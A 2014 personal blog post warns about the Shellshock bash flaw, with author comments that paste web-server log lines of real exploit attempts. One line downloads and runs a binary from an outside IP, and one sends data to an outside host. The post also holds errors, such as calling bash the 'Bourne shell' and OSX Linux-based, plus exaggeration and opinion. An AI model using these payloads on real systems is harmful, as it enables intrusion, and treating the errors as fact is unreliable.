Shell Shock

Part of the reason I took the website down was my fear that the United States and European union directly confronting Russia was going to result in massive cyber warfare breaking out onto the Internet. Running the server from my home was increasingly risky and stupid.

We have arrived at that point – I have written previously about the danger that everyone has accepted the idea of using “free” software being written and maintained by unknown individuals with unknown motives. The Heartbleed vulnerability was just a trailer for coming attractions. Unless you were the NSA and have the ability to directly monitor Internet traffic, it’s usefulness was relatively limited and only a small portion of computers had installed the defect.

I can’t begin to tell you how much more dangerous the shellshock flaw is. It is about as fundamental hole in Linux as there can be (and anything based on Linux like apple’s OSX on the Mac). While heartbleed actually affected only a small percentage of computers, shellshock affects every one of these computer ever made, including those that will be very hard to update like your internet connected light bulbs.

My servers had the patch applied last night because I pay close attention to these kinds of things – but even with the patch, it is clear The vulnerability is not completely gone and security analysts and programmers are not even certain of all the ways that the hole can be exploited.

If you are one of the people sitting on the fence thinking that backing up your important information off-line is paranoid, your time for action has come. Don’t put it off. If you are acting as a helper, you might want to take a vacation for a few weeks unless you are using a device which has no valuable information on it.

For those of you who are curious about the technical details, The flaw was reported by somebody that works for Akamai, A huge content distribution outfit used by many of the most important commercial websites in the world. They were also pioneers in figuring out ways to sidestep distributed denial of service attacks intended to blackmail banks into paying money to stop cyber attacks from knocking their web sites offline.

I doubt the person at Akamai was just sitting around with nothing to do, and was playing around looking for holes. My suspicion is they were successfully attacked, and did forensic research to figure out how their computer was compromised – and when they saw the details, they likely soiled their underwear.

Linux computers process commands through a piece of software called bash, which stands for the Bourne shell. While there are several alternatives, the vast majority Of Linux computers use bash – and even those who don’t probably have it on their computers. The flaw is extremely simple – by setting what is called an environment variable, The attacker can make the computer execute any command they want without any authentication to break into the system. All it takes is sending a very simple message to the Apache Web server, and the hacker has taken over your server.

While those commands operate only with the power of the Web server (user/group Apache), that’s enough over a hole that hackers could then start downloading and installing other things onto the computer and turn the server into Swiss cheese. This is already happening in the real world.

The data and coding for the streaming radio guide is backed up offline, but I really can’t guarantee that the server or the Internet as a whole will not fail in the near future. Even if the Russians and Chinese were not behind this, they are certainly paying attention to the power of exploiting flaws in “free” software and studying how the security professionals are reacting to the problem.

This entry was posted in Uncategorized. Bookmark the permalink.

3 Responses to Shell Shock

  1. Art Stone says:

    They’re here, knocking at the door:

    209.126.230.72 – – [24/Sep/2014:17:15:35 -0400] “GET / HTTP/1.0” 200 6421 “() { :; }; ping -c 11 216.75.60.74” “shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)”
    209.126.230.72 – – [24/Sep/2014:23:16:44 -0400] “GET / HTTP/1.0” 200 6422 “() { :; }; ping -c 11 209.126.230.74” “shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)”
    24.251.197.244 – – [25/Sep/2014:05:33:35 -0400] “GET / HTTP/1.1” 200 6361 “-” “() { :; }; echo -e \”Content-Type: text/plain\\n\”; echo qQQQQQq”
    166.78.61.142 – – [25/Sep/2014:11:23:12 -0400] “GET / HTTP/1.1” 200 6358 “-” “() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444”
    198.20.69.74 – – [25/Sep/2014:14:47:37 -0400] “GET / HTTP/1.1” 200 5689 “() { :; }; /bin/ping -c 1 104.131.0.69” “() { :; }; /bin/ping -c 1 104.131.0.69”
    168.235.145.99 – – [25/Sep/2014:20:47:32 -0400] “GET /cgi-sys/defaultwebpage.cgi HTTP/1.1” 400 347 “() { :;}; wget -O /tmp/syslogd http://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /tmp/syslogd;” “() { :;}; wget -O /tmp/syslogd http://69.163.37.115/nginx; chmod 777 /tmp/syslogd; /tmp/syslogd;”

    The first two is the “official” scanner which is partly doing this to deliberately trip intrusion detection systems and alert security people who may not know

  2. Art Stone says:

    While the hole was gaping, the vendors fixed this the way it was supposed to be done because it was discovered by a pro, not some geeky college kid wanting “profs”. The vendors had about 2 weeks to craft the patch, discuss the problem and anticipate the reaction. While the hole itself was huge, the ways to get in the door to use the problem were relatively rare, using web software that hasn’t been used for 10 years – so the chance of this spreading wildy is getting quite small, and the chances of the people doing it getting caught are very high.

  3. Art Stone says:

    Bash is maintained by one person in his 40s who took over an incomplete shell someone else tried to write and fix it. At the time he was a college student in his 20s. You can’t force free labor to do anything they don’t want to do.

    Open Source software is a religion based on socialism, not a business. In the real world, the code programmers document their work and have formal code reviews where other programmers look for mistakes or oversights – but everyone is being paid to do that.

    The Akamai person got motivated because of another earlier bug found in bash and spotted this much more serious hole. Because EVERYONE KEPT THEIR MOUTHS SHUT and the vendors had a couple weeks to investigate the ways the bug could be exploited and had time to test the fix, the first that the hacker world heard of the hole was because the patch had been rolled out.

Leave a Reply